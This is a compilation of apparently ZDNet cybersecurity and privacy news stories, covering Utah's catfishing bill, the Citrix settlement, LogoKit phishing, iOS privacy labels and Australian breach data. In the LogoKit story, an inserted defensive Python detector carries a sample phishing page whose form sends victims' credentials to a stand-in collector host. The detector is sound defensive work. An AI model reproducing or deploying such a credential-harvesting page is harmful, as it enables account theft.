More stories


    Utah tests the waters in turning online catfishing into a criminal act

    The State of Utah is considering changes to the law that will make online impersonation a criminal offense. 

    As reported by Fox 13, lawmakers in the US state proposed a series of bills this week tackling Internet security and privacy. The main submission, House Bill 80, suggests amendments to existing data privacy laws including an “affirmative defense” for companies caught up in data breaches.
    However, House Bill 239, introduced by Rep. Karianne Lisonbee, could be of more relevance to the general public if accepted into law, and could become a blueprint for other states to follow. This proposed legislation tackles online impersonation, also known as catfishing, and seeks to make these activities criminal.
    Titled “Online Impersonation Prohibition,” the bill proposes legal consequences for people who “use the name or persona of an individual” without consent. 
    This could include creating a fake social media account or website, posting or sending messages, the use of existing photos and information belonging to someone else, and other activities that encourage “reasonable belief” in a recipient that the user is genuine. 
    Furthermore, Lisonbee’s bill suggests that catfishing with the “intent to harm or defraud an individual” should not be tolerated. It appears that depending on the severity of the infraction, catfishing could be seen as a misdemeanor — or go up to a third-degree felony. 
    The proposed bill is not gunning for anonymous accounts or profiles that create an entirely new person based on stolen photos or fake information. Instead, it focuses on cases where an individual is conducting what could be argued to be a form of identity theft.

    This could be in order to harass someone, or, in the corporate world, could apply when threat actors perform social engineering to impersonate company employees or executives — with the overall goal of obtaining information and conducting further cyberattacks, such as in Business Email Compromise (BEC) campaigns. 
    Catfishing takes many forms. In the dating world, this usually means that a fake profile has been created by stealing someone’s photos, and the user masquerades as that person — potentially using a completely different name, location, and more. 
    These activities can be nothing more than a response to boredom — as damaging as they can be — or they may be conducted for fraudulent purposes, including financial theft, such as in cases of romance scams. 
    Previous and related coverage
    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More


    Citrix's $2.3 million settlement offer for employees impacted by data breach approved

    Citrix employees impacted by a data breach that resulted in the theft of their data have secured a $2.275 million settlement. 

    The settlement, first agreed in June 2020, has now met with the approval of Judge Ron Altman, as reported by Bloomberg Law. 
    This week, the judge issued preliminary approval for the settlement figure in the US District Court for the Southern District of Florida. 
    The class-action lawsuit, involving roughly 24,300 members, will be settled in return for Citrix providing the $2.275 million fund, usable for credit monitoring services, ID theft recovery, and up to $15,000 in reimbursement for expenses and loss per claimant. 
    Citrix disclosed the data breach in March 2019 after being alerted by the FBI of a possible network intrusion. Cyberattackers had infiltrated the software giant’s internal servers for a period of roughly five months between 2018 and 2019. 
    The company said that the threat actors had “intermittent access” to corporate resources and that password spraying was the likely method by which access to Citrix systems was obtained.
    Password spraying takes advantage of weak credentials and is a common method to compromise both corporate and personal accounts.

    Citrix employees were embroiled in the security incident. In a letter (.PDF) sent to those thought to be impacted — including staff, contractors, interns, job candidates, beneficiaries, and dependents — the company said their personal data may have been stolen. 
    This may have included PII, Social Security numbers, passport numbers, limited health insurance data, driver’s licenses, and financial account information such as payment card numbers. 
    A hearing over Zoom is set for June 10, 2021, where the settlement may be finalized. 
    ZDNet has reached out to Citrix and will update when we hear back. 


    Mozilla: Racism, misinformation, anti-worker policies are ‘undermining’ the Internet

    Racial bias, the spread of misinformation, and anti-worker policies are all eroding the ‘health’ of the Internet with its ecosystem becoming more and more fragmented, researchers say. 

    Mozilla’s 2020 Internet Health report, published on Thursday, examines key concerns that could threaten the openness, security, and accessibility of the Internet. 
    Now in its fourth year, the research aims to “engage policymakers, businesses, and the public in protecting the Internet as a global resource.”
    According to the non-profit, over the course of 2020, the web was besieged with problems related to a “built-in” racial bias that is exacerbating discrimination, and diversification is still an area that needs improvement. 
    From artificial intelligence (AI) algorithms that display bias against black and ethnic minority groups to search engine results that display white and US-centric content “by default,” Mozilla says that the Internet landscape “reflects a particular corpus of web content and the context of software developers, managers, and executives of technology companies who are rarely diverse in terms of race, ethnicity or gender.”
    In addition, tech giants failing to act transparently contributed to the spread of misinformation — a critical issue when you consider global events such as the spread of COVID-19 and the US election. Anti-vaccine messages, 5G-coronavirus theories, and QAnon conspiracies, to name but a few examples, have run rampant over the past year. 
    Apple, Microsoft, Amazon, Google parent company Alphabet, Facebook, Tencent, and Alibaba are cited as the seven major technology companies that predominantly control the web, and therefore have a responsibility to stem the flow of misinformation, which is reaching unstoppable levels. 

    From the beginning of the pandemic until June 2020, a total of 8,105 YouTube videos spreading COVID-19 disinformation accounted for over 20 million shares across social media platforms and 71 million reactions before they were removed.
    “The recent shocking events in the US highlighted so clearly how social media platforms can be used as megaphones to incite violence and spread disinformation — something we have seen time and again around the world,” the report says. “Despite years of complaints, there remains a worrying lack of transparency about the platform algorithms, governance and community dynamics at the heart of these models, preventing greater understanding and accountability.”
    Mozilla also highlighted the gig economy, and says that this work model — although useful for some who need flexible roles — is “trampling the rights of workers.” 
    The pandemic has increased demand for services made possible through online portals and mobile apps, including food and drink deliveries, but this has come at a cost.
    “Delivery drivers and other workers who use apps to find customers are often considered essential workers during the pandemic,” the report says. “Yet these platforms frequently offer unfair and dangerous working conditions.”

    Mozilla also suggested that the Internet as we know it is “splintering.” In 2020, every day, somewhere in the world, an Internet shutdown occurred, with India and Chad leading in arbitrary blackouts. 
    “The so-called “splinternet” is becoming a reality, with access to large swathes of the internet being increasingly restricted at a country level due to social or political conflict,” the non-profit says. “Censorship, surveillance, and content manipulation are closing off opportunities for people to participate openly and securely online.”
    While the Internet landscape last year exposed trends that could erode an open Internet, Mozilla says that improvements are not only possible, but also necessary. Encouraging more diverse pools of talent, rethinking the foundation of systems — from how gig workers are classified in law to how content moderation is performed — questioning technology companies that hold the power to sway online discourse, and developing community-focused alternatives to the online services we use in our daily lives are all ways toward a more open and fair Internet. 


    New cybercrime tool can build phishing pages in real-time

    A cybercrime group has developed a novel phishing toolkit that changes logos and text on a phishing page in real-time to adapt to targeted victims.
    Named LogoKit, this phishing tool is already deployed in the wild, according to threat intelligence firm RiskIQ, which has been tracking its evolution.
    The company said it already identified LogoKit installs on more than 300 domains over the past week and more than 700 sites over the past month.
    The security firm said LogoKit relies on sending users phishing links that contain their email addresses.
    “Once a victim navigates to the URL, LogoKit fetches the company logo from a third-party service, such as Clearbit or Google’s favicon database,” RiskIQ security researcher Adam Castleman said in a report on Wednesday.
    “The victim email is also auto-filled into the email or username field, tricking victims into feeling like they have previously logged into the site,” he added.
    “Should a victim enter their password, LogoKit performs an AJAX request, sending the target’s email and password to an external source, and, finally, redirecting the user to their [legitimate] corporate web site.”
    Image: RiskIQ

    Castleman said LogoKit achieves this with only “an embeddable set of JavaScript functions” that can be added to any generic login form or complex HTML document.
    This is different from standard phishing kits, most of which need pixel-perfect templates mimicking a company’s authentication pages.
    The kit’s modularity allows LogoKit operators to target any company they want with very little customization work and mount tens or hundreds of attacks a week against a wide-ranging set of targets.
    RiskIQ said that over the past month, it has seen LogoKit being used to mimic and create login pages for services ranging from generic login portals to false SharePoint portals, Adobe Document Cloud, OneDrive, Office 365, and several cryptocurrency exchanges.
    Because LogoKit is so small, the phishing kit doesn’t always need its own complex server setup, as some other phishing kits need. The kit can be hosted on hacked sites or legitimate pages for the companies LogoKit operators want to target.
    Furthermore, since LogoKit is a collection of JavaScript files, its resources can also be hosted on public trusted services like Firebase, GitHub, Oracle Cloud, and others, most of which will be whitelisted inside corporate environments and trigger few alerts when loaded inside an employee’s browser.
    RiskIQ said it’s tracking this new threat closely due to the kit’s simplicity, which the security firm believes helps improve its chances of a successful phish.
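The traits RiskIQ describes above (a victim email carried in the link, a logo fetched from a third-party service, the address prefilled into the login field, and a credential POST to a foreign origin) can be turned into a page-level detection heuristic for a URL-scanning or mail-gateway pipeline. This is an added example, not RiskIQ's or LogoKit's code; the Clearbit and Google favicon endpoints are assumed, and the sample pages and domains are constructed.

```python
import re
from urllib.parse import unquote, urlparse

# Third-party logo/favicon services the report names. Hostnames/paths are
# assumptions about those services' public endpoints, not taken from the report.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Where a credential POST would go: form actions, fetch() and XMLHttpRequest.open() targets.
POST_TARGET_RE = re.compile(
    r"""(?:action\s*=\s*|fetch\(\s*|\.open\(\s*['"][A-Za-z]+['"]\s*,\s*)['"](https?://[^'"]+)['"]""",
    re.I,
)


def email_from_url(url):
    """LogoKit links carry the victim's address in the URL: check query, fragment and path."""
    parsed = urlparse(url)
    for part in (parsed.query, parsed.fragment, parsed.path):
        m = EMAIL_RE.search(unquote(part))
        if m:
            return m.group(0)
    return None


def is_logo_service(url):
    """True for the logo/favicon lookup services the kit is reported to use (assumed endpoints)."""
    p = urlparse(url)
    if p.hostname == "logo.clearbit.com":
        return True
    return p.hostname == "www.google.com" and p.path.startswith("/s2/favicons")


def assess_page(page_url, html):
    """Return the LogoKit-style traits present in a fetched login page and a simple score."""
    page_host = urlparse(page_url).hostname
    traits = []
    email = email_from_url(page_url)
    if email:
        traits.append("email_in_url")
        if email in html:  # the kit autofills the address into the username field
            traits.append("email_prefilled")
    if any(is_logo_service(u) for u in URL_RE.findall(html)):
        traits.append("third_party_logo")
    for target in POST_TARGET_RE.findall(html):
        host = urlparse(target).hostname
        # credentials leaving for an origin other than the page's own (logo lookups excluded)
        if host not in (None, page_host) and not is_logo_service(target):
            traits.append("cross_origin_credential_post")
            break
    return {"page": page_url, "email": email, "traits": traits, "score": len(traits)}


# Constructed samples: a LogoKit-like page on a compromised host, and a benign portal.
SAMPLE_PHISH_URL = "https://compromised.example/login/#victim@targetcorp.example"
SAMPLE_PHISH_HTML = """<html><body>
<img id="logo" src="https://logo.clearbit.com/targetcorp.example">
<form id="login" action="https://collector.example/post.php" method="post">
  <input name="email" value="victim@targetcorp.example">
  <input name="password" type="password">
</form>
<script src="https://cdn-host.example/kit.js"></script>
</body></html>"""

SAMPLE_BENIGN_URL = "https://portal.example/login"
SAMPLE_BENIGN_HTML = """<html><body>
<img src="/static/logo.png">
<form action="https://portal.example/auth" method="post">
  <input name="email"><input name="password" type="password">
</form>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((SAMPLE_PHISH_URL, SAMPLE_PHISH_HTML), (SAMPLE_BENIGN_URL, SAMPLE_BENIGN_HTML)):
        print(assess_page(url, html))
```

A score of 3 or 4 is a strong LogoKit signal; a lone `third_party_logo` hit is common on legitimate pages and should not alert by itself.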


    Google says iOS privacy summaries will arrive when its apps are updated

    Image: Apple
    It has been over a month since Apple began publishing privacy summaries in all of its app stores across iOS, iPadOS, macOS, watchOS, and tvOS, with developers now needing to answer a questionnaire as part of submitting an app or update — but there has been one tech-giant-sized exception that has not provided the new information for users: Google.
    In a blog post on Wednesday, Google said it would supply information to Apple when its apps are updated.
    “As our iOS apps are updated with new features or bug fixes, you’ll see updates to our app page listings that include the new App Privacy Details,” Google Ads group product manager Christophe Combette wrote.
    Also due to arrive for users of Apple’s ecosystem is a new app tracking permission prompt appearing when apps want to track users, such as accessing an advertiser identifier (IDFA), which arrived as part of iOS 14.
    On this point, Google has not quite worked it all out yet.
    “When Apple’s policy goes into effect, we will no longer use information (such as IDFA) that falls under ATT [App Tracking Transparency] for the handful of our iOS apps that currently use it for advertising purposes. As such, we will not show the ATT prompt on those apps, in line with Apple’s guidance,” Combette said.
    “We are working hard to understand and comply with Apple’s guidelines for all of our apps in the App Store.”

    Google said the ATT changes, due in the next iOS beta release, will lower the amount of data advertisers can access, such as ad conversion data, and app publishers could see “significant impact” to ad revenue on iOS.
    “We’re working with the industry to give Apple feedback on how to further improve SKAdNetwork so advertisers can measure their campaign results accurately on iOS 14,” he said.
    “We also encourage advertisers to monitor the performance and delivery of all iOS App campaigns closely and, if necessary, make adjustments to budgets and bids to achieve their goals.”
    On Thursday, Apple took a swipe at the ad industry with its A Day in the Life of your Data report, which said apps, on average, had six trackers from other companies that “have the sole purpose of collecting and tracking people and their personal information”, and the industry collects $227 billion in revenue each year.
    “Privacy means peace of mind, it means security, and it means you are in the driver’s seat when it comes to your own data,” Apple senior vice president of software engineering Craig Federighi said in a statement.
    “Our goal is to create technology that keeps people’s information safe and protected. We believe privacy is a fundamental human right, and our teams work every day to embed it in everything we make.”
    Earlier on Thursday, the Australian Competition and Consumer Commission added to its list of historically questionable decisions by proposing Australia adopt a common transaction ID.
    “Industry should implement a common system whereby each transaction in the ad tech supply chain is identified with a single identifier which allows a single transaction to be traced through the entire supply chain. This should be done in a way that protects the privacy of consumers,” it wrote.


    519 data breach notifications include 33 from Australian government entities

    Australian entities covered by the Privacy Act reported 519 instances of data breaches in the six months to December 2020, a 5% increase from the first half of the year.
    Data breach notification to the Office of the Australian Information Commissioner (OAIC) became mandatory under the Notifiable Data Breaches (NDB) scheme in February 2018.
    Since the mandate, health has been the most affected sector; the latest report [PDF] shows no change, with health accounting for 123 notifications, followed by finance with 83 notifications. The Australian government entered the top five sectors for the first time, accounting for 6% of the total, with 33 notifications.
    The Privacy Act 1988 covers most Australian government agencies; it does not cover a number of intelligence and national security agencies, nor does it cover state and local government agencies, public hospitals, and public schools.
    Delving deeper into the government faux pas, human error was to blame for 29 of the sector’s notifications, two stemmed from a malicious or criminal attack, one was attributed to a “cyber incident”, and the remaining one to social engineering/impersonation.
    The “cyber incident” was confirmed as a brute-force attack on the unnamed entity.

    The most common type of human error to blame for the government’s notifications was personal information being sent to the wrong recipient. Failure to redact was to blame for five notifications.
    In total, malicious or criminal attacks, including cyber incidents, remained the leading source of data breaches, accounting for 58% of all notifications — 310 breaches. Data breaches resulting from human error accounted for 38% of notifications, at 204. System faults accounted for the remaining 25 breaches notified.
    “While it is possible that this increase is linked to changed business and information handling practices resulting from remote working arrangements, the OAIC is yet to identify any information or incidents that conclusively prove a link,” the office said, pointing to COVID-19 stay at home measures and the uptick of human error-related breaches.
    91% of data breaches notified under the NDB scheme from July to December 2020 involved contact information, such as an individual’s home address, phone number, or email address.
    Data breaches resulting from social engineering or impersonation accounted for 34 notifications. Actions taken by a rogue employee or insider threat accounted for 35 notifications, up from 23, and theft of paperwork or storage devices resulted in 29 notifications.
    23% of all notifications received by the OAIC involved malicious actors gaining access to accounts using compromised or stolen credentials, with email-based phishing the most common method.
    “This confirms that email-based vulnerability is one of the greatest risks to information security facing organisations,” the report says. “The human factor is an important element in an organisation’s overall information and cybersecurity posture, given these attacks rely on a person clicking on a phishing link.”
    68% of data breaches affected 100 individuals or fewer, but one of the notifications affected over 10 million individuals.
    August saw 208 notifications made, and November only 62.
    The OAIC also said it received a number of notifications during the reporting period that involved a managed service provider (MSP) hosting or holding data on behalf of one or more other entities.


    NSW running Data61 de-identification tool across COVID data prior to public release

    The New South Wales government has been using a tool to help de-identify data related to COVID-19 prior to the release of that data to the public, the CSIRO said on Thursday.
    The tool, dubbed Personal Information Factor (PIF), has been created by Data61, the NSW government, the Australian Computer Society, Cyber Security Cooperative Research Centre (CSCRC), and “several other groups”.
    “The privacy tool assesses the risks to an individual’s data within any dataset; allowing targeted and effective protection mechanisms to be put in place,” the CSIRO claimed.
    “The software uses a sophisticated data analytics algorithm to identify the risks that sensitive, de-identified and personal information within a dataset can be re-identified and matched to its owner.”
    NSW chief data scientist Dr Ian Oppermann said the tool was being used on datasets containing data on people who had been infected with COVID-19 before it was made publicly available.
    “Given the very strong community interest in growing COVID-19 cases, we needed to release critical and timely information at a fine-grained level detailing when and where COVID-19 cases were identified,” Oppermann said.
    “This also included information such as the likely cause of infection and, earlier in the pandemic, the age range of people confirmed to be infected.

    “We wanted the data to be as detailed and granular as possible, but we also needed to protect the privacy and identity of the individuals associated with those datasets.”
    Data61 said PIF assigns a risk score to a dataset and makes recommendations to make de-identification “more secure and safe”.
    The tool is also being used on other datasets such as domestic violence data and public transport usage, Data61 said.
    PIF will be made available by June 22.
    In a recent submission to a review of the Privacy Act, security researcher Vanessa Teague said de-identification does not work.
    “A person’s detailed individual record cannot be adequately de-identified or anonymised, and should not be sold, shared, or published without the person’s explicit, genuine, informed consent,” Teague said.
    “Identifiable personal information should be protected exactly like all other personal information, even if an attempt to de-identify it was made.”
    At the end of 2017, a team of academics, including Teague, was able to re-identify some of the data from a set containing historic longitudinal medical billing records on one-tenth of all Australians.
    “We found that patients can be re-identified, without decryption, through a process of linking the unencrypted parts of the record with known information about the individual such as medical procedures and year of birth,” Dr Chris Culnane said at the time.
    “This shows the surprising ease with which de-identification can fail, highlighting the risky balance between data sharing and privacy.”
    In September 2016, the same dataset was found by the University of Melbourne team to not be encrypting supplier codes properly. The dataset was subsequently pulled down by the Department of Health.
    “Leaving out some of the algorithmic details didn’t keep the data secure – if we can reverse-engineer the details in a few days, then there is a risk that others could do so too,” the team said at the time.
    “Security through obscurity doesn’t work — keeping the algorithm secret wouldn’t have made the encryption secure, it just would have taken longer for security researchers to identify the problem.
    “It is much better for such problems to be found and addressed than to remain unnoticed.”
    In response, the Australian government sought to criminalise the intentional re-identification and disclosure of de-identified Commonwealth datasets and reverse the onus of proof, with the aim of applying the changes retrospectively from 29 September 2016.
    The changes lapsed at the 2019 election.



    Facebook's Zuckerberg takes aim at Apple's privacy pitch, motives with iOS 14

    Facebook’s fourth quarter earnings conference call featured CEO Mark Zuckerberg calling out Apple’s iOS 14 moves, saying the iPhone maker was “one of our biggest competitors” and questioning motives.
    Yes folks, Facebook’s Zuckerberg went a little pro wrestling (at least for tech CEOs not named Larry Ellison) in his Apple confrontation.
    Zuckerberg has a reason to be a bit bent out of shape. Facebook said its future results could be hurt by privacy changes in Apple’s iOS 14. Zuckerberg argued that Apple’s changes are aimed at benefiting iMessage and harm small businesses.
    Here are Zuckerberg’s comments in full:

    WhatsApp, and the direction that we’re heading in with Messenger, are the best private social apps available. Now we have a lot of competitors who make claims about privacy that are often misleading. Now Apple recently released so-called nutrition labels, which focused largely on metadata that apps collect rather than the privacy and security of people’s actual messages. But iMessage stores non-end-to-end encrypted backups of your messages by default unless you disable iCloud. So Apple and governments have the ability to access most people’s messages. So when it comes to what matters most, protecting people’s messages, I think that WhatsApp is clearly superior. Now since I try to use these earnings calls to discuss aspects of business strategy that I think are important for investors to understand, I do want to highlight that we increasingly see Apple as one of our biggest competitors. iMessage is a key linchpin of their ecosystem. It comes pre-installed on every iPhone, and they preference it with private APIs and permissions, which is why iMessage is the most used messaging service in the U.S. And now we are also seeing Apple’s business depend more and more on gaining share in apps and services against us and other developers. So Apple has every incentive to use their dominant platform position to interfere with how our apps and other apps work, which they regularly do to preference their own. And this impacts the growth of millions of businesses around the world including with the upcoming iOS 14 changes, many small businesses will no longer be able to reach their customers with targeted ads. Now Apple may say that they’re doing this to help people, but the moves clearly track their competitive interests. And I think that this dynamic is important for people to understand because we and others are going to be up against this for the foreseeable future. 
    Now our messaging services continue growing, but it is an uphill battle, and our services just need to be that much better as private social platforms to succeed.

    Facebook operating chief Sheryl Sandberg noted that Facebook will find ways to amplify stories about small businesses worried about Apple’s iOS changes.
    Apple CEO Tim Cook didn’t address Facebook by name but did stick to the company’s pitch on privacy. Cook said:

    Tomorrow is International Privacy Day, and we continue to set new standards to protect users’ right to privacy, not just for our own products but to be the ripple in the pond that moves the whole industry forward. Most recently, we’re in the process of deploying new requirements across the App Store ecosystem that give users more knowledge about and new tools to control the ways that apps gather and share their personal data.